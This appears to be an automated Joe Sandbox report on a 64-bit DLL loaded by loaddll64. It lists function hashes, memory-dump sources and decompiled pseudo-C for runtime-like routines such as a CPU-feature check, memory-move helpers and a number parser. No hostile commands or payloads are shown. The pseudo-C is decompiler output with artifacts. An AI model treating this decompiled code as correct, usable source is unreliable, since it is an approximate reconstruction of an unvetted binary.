Opcode ID: d4a31af1c88a1e6ab448c518336f099c9e743a345a8116ccbb9bcacf6df5466d
Instruction ID: d8d0a970803080bdb9b0c4b9adcb29ea95a621f075ad5d7819bf759c13dfa2c1
Opcode Fuzzy Hash: d4a31af1c88a1e6ab448c518336f099c9e743a345a8116ccbb9bcacf6df5466d
Instruction Fuzzy Hash: AE3105B090034A8BDB4CDF68C88A4DE3FA1BB58398F10461DFC5A9A350D3B4D9A4CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180012110 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69f1bd5eb2f0ebfb53ff7e4ae7896f851b8bbd9ae22bdf3f2cf4232ccd8f10e8
Instruction ID: 8f5d51aba00c4f23d52c296157a313ffc4782a84c6f71662d1847f1d9af8e599
Opcode Fuzzy Hash: 69f1bd5eb2f0ebfb53ff7e4ae7896f851b8bbd9ae22bdf3f2cf4232ccd8f10e8
Instruction Fuzzy Hash: E431ADB55187818BC348DF28C54A51ABBE1FB8C308F504B2EF8CAA6294D778D6058B4A

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800197AC Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1cb5be32486d082a1004d5cd3269ee3ed63ecfe90488e34a48b9d161af83a4e
Instruction ID: 79354f79ef65217a83ad5669e5e5daff520c5b483ab2cf90db9683dfdc12feb2
Opcode Fuzzy Hash: a1cb5be32486d082a1004d5cd3269ee3ed63ecfe90488e34a48b9d161af83a4e
Instruction Fuzzy Hash: A331C5B190434A8BDB48DF24C88A5DE7FF0FB58388F10461CE85AA7250D3B4D6A4CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180020D54 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 403423f91ab6d2efc18bb9c6fca72d8179c469d66eb0a9203399f0508270c383
Instruction ID: f7e907a5a4d268517ac5d39fb781b2abcac55db7633d781cedf7f9941ca353e5
Opcode Fuzzy Hash: 403423f91ab6d2efc18bb9c6fca72d8179c469d66eb0a9203399f0508270c383
Instruction Fuzzy Hash: 8F21A0B152C781AFD388DF28C19981ABBE1FB88304F806A1DF98687350D374D844CB46

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000E828 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bd384b18a8f018deb1ae8c02f50e3dfc83e34399570a2e179077375e0c66cc5
Instruction ID: e563aa27f56e2ecce816434c0e114442c931e28e35474e2e86562d3eaff730a2
Opcode Fuzzy Hash: 7bd384b18a8f018deb1ae8c02f50e3dfc83e34399570a2e179077375e0c66cc5
Instruction Fuzzy Hash: 8931707552D784AFC788DF28D48991EBBF0FB98345F906A1DF88686264E374D445CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180022B8C Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa0a547024bc87cfc42133694cef77c279f754c0bf310b00985741a0ad6876d3
Instruction ID: cfe9eacf390d468c13f16f556d0757c07c704974f4e6988c0e8e4883957bcd26
Opcode Fuzzy Hash: fa0a547024bc87cfc42133694cef77c279f754c0bf310b00985741a0ad6876d3
Instruction Fuzzy Hash: 95316174529380AFD398DF28D48A81BBBF0FB99314F806E1DF9C68A2A0D774D405CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000E368 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f840c702cc6db683c56574f5bbeabe7a5e8170610e02f4bacfea2193c17d021
Instruction ID: 95bb47a97fe7a9d8d529fae77a119aa2dd9a35a31096ffbc611f9293c9fe5b2f
Opcode Fuzzy Hash: 0f840c702cc6db683c56574f5bbeabe7a5e8170610e02f4bacfea2193c17d021
Instruction Fuzzy Hash: 2531F17080438E8BDB48CF64C8865DFBFB0FB48358F104A19EC5AA6250D7B89664CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180015400 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3589b8c10d41c6a6d8f55a96a52859424ad6790b55d32d6910364891c60a7e75
Instruction ID: aca377b28207093ad69189230e20808a2953a665cdfbd0516b7c3ce528793aa5
Opcode Fuzzy Hash: 3589b8c10d41c6a6d8f55a96a52859424ad6790b55d32d6910364891c60a7e75
Instruction Fuzzy Hash: 7F2168B15187808BD348DF28D54951ABBE1BB8C30CF400B2DF8CAAA2A1D778D604CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466AB50 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00007FFD7FFD1466AB50(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t25;

				_t25 = __r8;
				r8d = 0;
				 *0x146df4f8 = r8d;
				_t1 = _t25 + 1; // 0x1
				r9d = _t1;
				asm("cpuid");
				_v16 = r9d;
				_v16 = 0;
				_v20 = __ebx;
				_v12 = __edx;
				if (0 != 0x18001000) goto 0x1466abb1;
				asm("xgetbv");
				_a8 = __rdx << 0x00000020 | __rax;
				r8d =  *0x146df4f8; // 0x1
				r8d =  ==  ? r9d : r8d;
				 *0x146df4f8 = r8d;
				 *0x146df4fc = r8d;
				return 0;
			}

0x7ffd1466ab50
0x7ffd1466ab56
0x7ffd1466ab5b
0x7ffd1466ab62
0x7ffd1466ab62
0x7ffd1466ab69
0x7ffd1466ab6b
0x7ffd1466ab73
0x7ffd1466ab79
0x7ffd1466ab7d
0x7ffd1466ab83
0x7ffd1466ab87
0x7ffd1466ab91
0x7ffd1466ab9b
0x7ffd1466aba6
0x7ffd1466abaa
0x7ffd1466abb1
0x7ffd1466abbf

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d266753878d099352c440ad7ca346e4687f286913e8b3a6842572f5f5984201
Instruction ID: 1c390850e43f5eda407eb0a2a5978f21e6c3aadbc28a5d0a674ce09573442054
Opcode Fuzzy Hash: 0d266753878d099352c440ad7ca346e4687f286913e8b3a6842572f5f5984201
Instruction Fuzzy Hash: E5F068717186568AEBD8CF39A4A2A6977D0EB09394F608079E6DD87B04D63C90508F14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14663240 Relevance: 55.8, APIs: 37, Instructions: 252
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00007FFD7FFD14663240(void* __edx, void* __eflags, long long __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, intOrPtr _a40, long long _a48) {
				long long _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				long long _v64;
				long long _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				long long _v104;
				long long _v112;
				long long _v120;
				long long _v128;
				long long _v136;
				long long _t207;
				intOrPtr* _t209;
				intOrPtr _t218;
				intOrPtr _t221;
				long long _t223;
				void* _t225;
				intOrPtr _t228;
				long long _t229;
				void* _t230;
				intOrPtr _t235;
				long long _t237;
				void* _t239;
				void* _t243;
				long long _t245;
				void* _t247;
				long long _t248;
				void* _t249;
				long long _t250;
				void* _t251;
				long long _t257;

				_t207 = __rax;
				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				E00007FFD7FFD146621F0(__eflags, __rax, _a8, _a16);
				E00007FFD7FFD146621F0(__eflags, __rax, _a32, _a40);
				E00007FFD7FFD14662400(__eflags, __rax, _a8, _a16, _a24);
				_a24 = _t207;
				E00007FFD7FFD14662400(__eflags, _t207, _a32, _a40, _a48);
				_a48 = _t207;
				_t209 = 0xffffffff - _a48;
				_v120 = 0xffffffff;
				E00007FFD7FFD14662170(_t209, _a8);
				_t211 =  *_t209 - _a24;
				if (_v120 - 0xffffffff > 0) goto 0x14663315;
				E00007FFD7FFD14662230(_a8);
				E00007FFD7FFD14662170( *_t209 - _a24, _a8);
				_v136 = 0xffffffff;
				E00007FFD7FFD14662170( *_t211 - _a24 - _a16, _a8);
				_v128 = 0xffffffff;
				E00007FFD7FFD14662170( *((intOrPtr*)( *_t211 - _a24 - _a16)) + _a48 - _a24, _a8);
				if ( *0xffffffff - _v128 >= 0) goto 0x1466338e;
				r8d = 0;
				E00007FFD7FFD146622B0( *((intOrPtr*)( *_t211 - _a24 - _a16)) + _a48 - _a24, _a8, _v128);
				_t218 = _a24;
				if (_a48 != _t218) goto 0x146633ec;
				E00007FFD7FFD146618D0(_t218, _a32);
				_v112 = _t218 + _a40;
				E00007FFD7FFD146618F0(_t218 + _a40, _a8);
				E00007FFD7FFD14661230(_t218 + _a40 + _a16, _v112, _a48);
				goto 0x14663810;
				_t221 = _a32;
				if (_a8 == _t221) goto 0x146634a2;
				E00007FFD7FFD146618F0(_t221, _a8);
				_t223 = _t221 + _a16 + _a24;
				_v104 = _t223;
				E00007FFD7FFD146618F0(_t223, _a8);
				_t225 = _t223 + _a16 + _a48;
				E00007FFD7FFD14661230(_t225, _v104, _v136);
				E00007FFD7FFD146618D0(_t225, _a32);
				_v96 = _t225 + _a40;
				E00007FFD7FFD146618F0(_t225 + _a40, _a8);
				E00007FFD7FFD146611E0(_t225 + _a40 + _a16, _v96, _a48);
				goto 0x14663810;
				_t228 = _a24;
				if (_a48 - _t228 >= 0) goto 0x14663558;
				E00007FFD7FFD146618F0(_t228, _a8);
				_t229 = _t228 + _a40;
				_v88 = _t229;
				E00007FFD7FFD146618F0(_t229, _a8);
				_t230 = _t229 + _a16;
				E00007FFD7FFD14661230(_t230, _v88, _a48);
				E00007FFD7FFD146618F0(_t230, _a8);
				_v80 = _t230 + _a16 + _a24;
				E00007FFD7FFD146618F0(_t230 + _a16 + _a24, _a8);
				E00007FFD7FFD14661230(_t230 + _a16 + _a24 + _a16 + _a48, _v80, _v136);
				goto 0x14663810;
				_t235 = _a16;
				if (_a40 - _t235 > 0) goto 0x1466360e;
				E00007FFD7FFD146618F0(_t235, _a8);
				_t237 = _t235 + _a16 + _a24;
				_v72 = _t237;
				E00007FFD7FFD146618F0(_t237, _a8);
				_t239 = _t237 + _a16 + _a48;
				E00007FFD7FFD14661230(_t239, _v72, _v136);
				E00007FFD7FFD146618F0(_t239, _a8);
				_v64 = _t239 + _a40;
				E00007FFD7FFD146618F0(_t239 + _a40, _a8);
				E00007FFD7FFD14661230(_t239 + _a40 + _a16, _v64, _a48);
				goto 0x14663810;
				_t243 = _a16 + _a24;
				if (_t243 - _a40 > 0) goto 0x146636eb;
				E00007FFD7FFD146618F0(_t243, _a8);
				_t245 = _t243 + _a16 + _a24;
				_v56 = _t245;
				E00007FFD7FFD146618F0(_t245, _a8);
				_t247 = _t245 + _a16 + _a48;
				E00007FFD7FFD14661230(_t247, _v56, _v136);
				E00007FFD7FFD146618F0(_t247, _a8);
				_t248 = _t247 + _a40 + _a48 - _a24;
				_v48 = _t248;
				E00007FFD7FFD146618F0(_t248, _a8);
				_t249 = _t248 + _a16;
				E00007FFD7FFD14661230(_t249, _v48, _a48);
				goto 0x14663810;
				E00007FFD7FFD146618F0(_t249, _a8);
				_t250 = _t249 + _a40;
				_v40 = _t250;
				E00007FFD7FFD146618F0(_t250, _a8);
				_t251 = _t250 + _a16;
				E00007FFD7FFD14661230(_t251, _v40, _a24);
				E00007FFD7FFD146618F0(_t251, _a8);
				_v32 = _t251 + _a16 + _a24;
				E00007FFD7FFD146618F0(_t251 + _a16 + _a24, _a8);
				E00007FFD7FFD14661230(_t251 + _a16 + _a24 + _a16 + _a48, _v32, _v136);
				_t257 = _a48 - _a24;
				_v24 = _t257;
				E00007FFD7FFD146618F0(_t257, _a8);
				_t259 = _t257 + _a40 + _a48;
				_v16 = _t257 + _a40 + _a48;
				E00007FFD7FFD146618F0(_t257 + _a40 + _a48, _a8);
				E00007FFD7FFD14661230(_t259 + _a16 + _a24, _v16, _v24);
				return E00007FFD7FFD146623A0(_t259 + _a16 + _a24, _a8, _v128);
			}

0x7ffd14663240
0x7ffd14663240
0x7ffd14663245
0x7ffd1466324a
0x7ffd1466324f
0x7ffd1466326b
0x7ffd14663280
0x7ffd1466329d
0x7ffd146632a2
0x7ffd146632c2
0x7ffd146632c7
0x7ffd146632d6
0x7ffd146632de
0x7ffd146632eb
0x7ffd146632fb
0x7ffd14663306
0x7ffd14663310
0x7ffd1466331d
0x7ffd14663338
0x7ffd14663345
0x7ffd1466335d
0x7ffd1466336a
0x7ffd14663377
0x7ffd14663379
0x7ffd14663389
0x7ffd1466338e
0x7ffd1466339e
0x7ffd146633a8
0x7ffd146633b5
0x7ffd146633c2
0x7ffd146633e2
0x7ffd146633e7
0x7ffd146633ec
0x7ffd146633fc
0x7ffd1466340a
0x7ffd14663417
0x7ffd1466341f
0x7ffd1466342c
0x7ffd14663439
0x7ffd14663451
0x7ffd1466345e
0x7ffd1466346b
0x7ffd14663478
0x7ffd14663498
0x7ffd1466349d
0x7ffd146634a2
0x7ffd146634b2
0x7ffd146634c0
0x7ffd146634c5
0x7ffd146634cd
0x7ffd146634da
0x7ffd146634df
0x7ffd146634fa
0x7ffd14663507
0x7ffd1466351c
0x7ffd14663529
0x7ffd1466354e
0x7ffd14663553
0x7ffd14663558
0x7ffd14663568
0x7ffd14663576
0x7ffd14663583
0x7ffd1466358b
0x7ffd14663598
0x7ffd146635a5
0x7ffd146635bd
0x7ffd146635ca
0x7ffd146635d7
0x7ffd146635e4
0x7ffd14663604
0x7ffd14663609
0x7ffd14663621
0x7ffd1466362c
0x7ffd1466363a
0x7ffd14663647
0x7ffd1466364f
0x7ffd1466365c
0x7ffd14663669
0x7ffd14663681
0x7ffd1466368e
0x7ffd146636b1
0x7ffd146636b4
0x7ffd146636c1
0x7ffd146636c6
0x7ffd146636e1
0x7ffd146636e6
0x7ffd146636f3
0x7ffd146636f8
0x7ffd14663700
0x7ffd14663710
0x7ffd14663715
0x7ffd14663733
0x7ffd14663740
0x7ffd14663755
0x7ffd14663765
0x7ffd1466378d
0x7ffd146637a5
0x7ffd146637a8
0x7ffd146637b8
0x7ffd146637c5
0x7ffd146637cd
0x7ffd146637dd
0x7ffd1466380b
0x7ffd14663831

APIs

Part of subcall function 00007FFD146621F0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFD14662217

Part of subcall function 00007FFD14662170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD1466217E

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFD14663310
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD146633A8
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD146633C2
char_traits.LIBCPMTD ref: 00007FFD146633E2
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD1466342C
char_traits.LIBCPMTD ref: 00007FFD14663451
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD1466345E

Part of subcall function 00007FFD146618D0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD146618DE

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14663478
char_traits.LIBCPMTD ref: 00007FFD14663498
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD1466340A

Part of subcall function 00007FFD146618F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD146618FE

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD146634C0
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD146634DA
char_traits.LIBCPMTD ref: 00007FFD146634FA
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14663507
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14663529
char_traits.LIBCPMTD ref: 00007FFD1466354E

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityQueue$char_traits$EmptyQueue::Structured$Mtx_guardMtx_guard::~_
String ID:
API String ID: 1550686663-0
Opcode ID: 6fddd8db350bc00e0fa7d7ec8e822f1350b5388c6aacc03662ae6e3237efefb8
Instruction ID: 179ad746e9fdd0e850bc82f18c31f2a576f62202d82542dba8397926b1657455
Opcode Fuzzy Hash: 6fddd8db350bc00e0fa7d7ec8e822f1350b5388c6aacc03662ae6e3237efefb8
Instruction Fuzzy Hash: CBD1CB66A1DFC185EA70DB55F4A13EBB361FBCA7A4F004026DA8D83B5ADF2CD4418B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14662FC0 Relevance: 15.1, APIs: 10, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00007FFD7FFD14662FC0(void* __edx, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, long long _a40) {
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				long long _v64;
				long long _v72;
				long long _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				long long _t108;
				long long _t110;
				intOrPtr* _t112;
				intOrPtr _t116;
				long long _t118;

				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if ((E00007FFD7FFD14662250(__rax, _a8, _a32) & 0x000000ff) == 0) goto 0x1466303c;
				E00007FFD7FFD146618F0(__rax, _a8);
				_t100 = _a32 - __rax;
				_v64 = _a40;
				_v72 = _t100;
				E00007FFD7FFD14663240(__edx, E00007FFD7FFD14662250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16, _a24, _a8);
				goto 0x14663214;
				E00007FFD7FFD146621F0(E00007FFD7FFD14662250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16);
				E00007FFD7FFD14662400(E00007FFD7FFD14662250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16, _a24);
				_a24 = _t100;
				_t102 = 0xffffffff - _a40;
				_v40 = 0xffffffff;
				E00007FFD7FFD14662170(_t102, _a8);
				_t104 =  *_t102 - _a24;
				if (_v40 - 0xffffffff > 0) goto 0x146630aa;
				E00007FFD7FFD14662230(_a8);
				E00007FFD7FFD14662170(_t104, _a8);
				_v56 =  *_t104 - _a24 - _a16;
				_t108 = _a24;
				if (_a40 - _t108 >= 0) goto 0x14663126;
				E00007FFD7FFD146618F0(_t108, _a8);
				_t110 = _t108 + _a16 + _a24;
				_v32 = _t110;
				E00007FFD7FFD146618F0(_t110, _a8);
				_t112 = _t110 + _a16 + _a40;
				E00007FFD7FFD14661230(_t112, _v32, _v56);
				E00007FFD7FFD14662170(_t112, _a8);
				_v48 =  *_t112 + _a40 - _a24;
				if (_a40 > 0) goto 0x14663162;
				if (_a24 <= 0) goto 0x1466320f;
				r8d = 0;
				if ((E00007FFD7FFD146622B0( *_t112 + _a40 - _a24, _a8, _v48) & 0x000000ff) == 0) goto 0x1466320f;
				_t116 = _a40;
				if (_a24 - _t116 >= 0) goto 0x146631d9;
				E00007FFD7FFD146618F0(_t116, _a8);
				_t118 = _t116 + _a16 + _a24;
				_v24 = _t118;
				E00007FFD7FFD146618F0(_t118, _a8);
				_t120 = _t118 + _a16 + _a40;
				E00007FFD7FFD14661230(_t118 + _a16 + _a40, _v24, _v56);
				E00007FFD7FFD146618F0(_t118 + _a16 + _a40, _a8);
				E00007FFD7FFD146611E0(_t120 + _a16, _a32, _a40);
				return E00007FFD7FFD146623A0(_t120 + _a16, _a8, _v48);
			}

0x7ffd14662fc0
0x7ffd14662fc5
0x7ffd14662fca
0x7ffd14662fcf
0x7ffd14662fef
0x7ffd14662ff6
0x7ffd14663006
0x7ffd14663011
0x7ffd14663016
0x7ffd14663032
0x7ffd14663037
0x7ffd14663046
0x7ffd1466305d
0x7ffd14663062
0x7ffd14663071
0x7ffd14663079
0x7ffd14663083
0x7ffd14663093
0x7ffd1466309e
0x7ffd146630a5
0x7ffd146630af
0x7ffd146630c7
0x7ffd146630cc
0x7ffd146630dc
0x7ffd146630e3
0x7ffd146630ed
0x7ffd146630f5
0x7ffd146630ff
0x7ffd14663109
0x7ffd14663121
0x7ffd1466312b
0x7ffd14663143
0x7ffd14663151
0x7ffd1466315c
0x7ffd14663162
0x7ffd14663179
0x7ffd1466317f
0x7ffd1466318f
0x7ffd14663196
0x7ffd146631a0
0x7ffd146631a8
0x7ffd146631b2
0x7ffd146631bc
0x7ffd146631d4
0x7ffd146631de
0x7ffd146631fb
0x7ffd14663218

APIs

Part of subcall function 00007FFD14662250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD1466226B
Part of subcall function 00007FFD14662250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD1466227C

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14662FF6

Part of subcall function 00007FFD146618F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD146618FE

Part of subcall function 00007FFD14663240: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFD14663310
Part of subcall function 00007FFD14663240: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD146633A8
Part of subcall function 00007FFD14663240: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD146633C2
Part of subcall function 00007FFD14663240: char_traits.LIBCPMTD ref: 00007FFD146633E2

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFD146630A5
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD146630E3
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD146630FF
char_traits.LIBCPMTD ref: 00007FFD14663121
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14663196
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD146631B2
char_traits.LIBCPMTD ref: 00007FFD146631D4
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD146631DE
char_traits.LIBCPMTD ref: 00007FFD146631FB

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityQueue$char_traits$Mtx_guardMtx_guard::~_$EmptyQueue::Structured
String ID:
API String ID: 4284633421-0
Opcode ID: f0975427a75d2d34f6acfc41e81dde88df83928edc9a6f38a481e59775bea447
Instruction ID: 2cf1c1241e31cf45c285cbbe4e35694071da90595241f58c194f9d6109b5c034
Opcode Fuzzy Hash: f0975427a75d2d34f6acfc41e81dde88df83928edc9a6f38a481e59775bea447
Instruction Fuzzy Hash: 0251A326A1CF8186EA50DB75E4913AAA3A0F7C67E4F105136EBDD83B69DF2CD4418F00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466893C Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 489
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00007FFD7FFD1466893C(signed short* __rax, long long __rbx, long long __rcx, signed short** __rdx, void* __r8, long long _a8, intOrPtr _a16, long long _a24) {
				void* _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				long long _v160;
				long long _v168;
				void* __rsi;
				void* __rbp;
				void* _t155;
				void* _t185;
				signed short _t199;
				signed short _t200;
				signed int _t201;
				signed int _t250;
				signed int _t252;
				signed int _t254;
				signed int _t255;
				signed int _t258;
				signed int _t261;
				signed short* _t380;
				signed short* _t381;
				signed short* _t382;
				signed short* _t384;
				signed short** _t385;
				long long _t386;
				long long* _t389;
				signed short* _t390;
				long long* _t394;
				long long* _t395;
				long long* _t396;
				signed short** _t397;
				void* _t398;
				void* _t399;
				signed short* _t404;
				signed short* _t405;
				long long _t406;
				signed short* _t407;
				long long _t408;
				intOrPtr _t409;

				_t403 = __r8;
				_t394 = __rdx;
				_t386 = __rbx;
				_a24 = __rbx;
				_a8 = __rcx;
				_t406 =  *((intOrPtr*)(__rdx));
				r13d = 0;
				_t255 = r9b & 0xffffffff;
				r14d = r8d;
				_v64 = _t406;
				_t397 = __rdx;
				if (_t406 != 0) goto 0x14668987;
				E00007FFD7FFD1466B420(__rax);
				 *__rax = 0x16;
				E00007FFD7FFD14669744();
				goto 0x146689b9;
				if (r14d == 0) goto 0x146689d1;
				_t4 = _t403 - 2; // -2
				if (_t4 - 0x22 <= 0) goto 0x146689d1;
				_v160 = __rcx;
				r9d = 0;
				 *((char*)(__rcx + 0x30)) = 1;
				r8d = 0;
				 *(__rcx + 0x2c) = 0x16;
				_v168 = _t408;
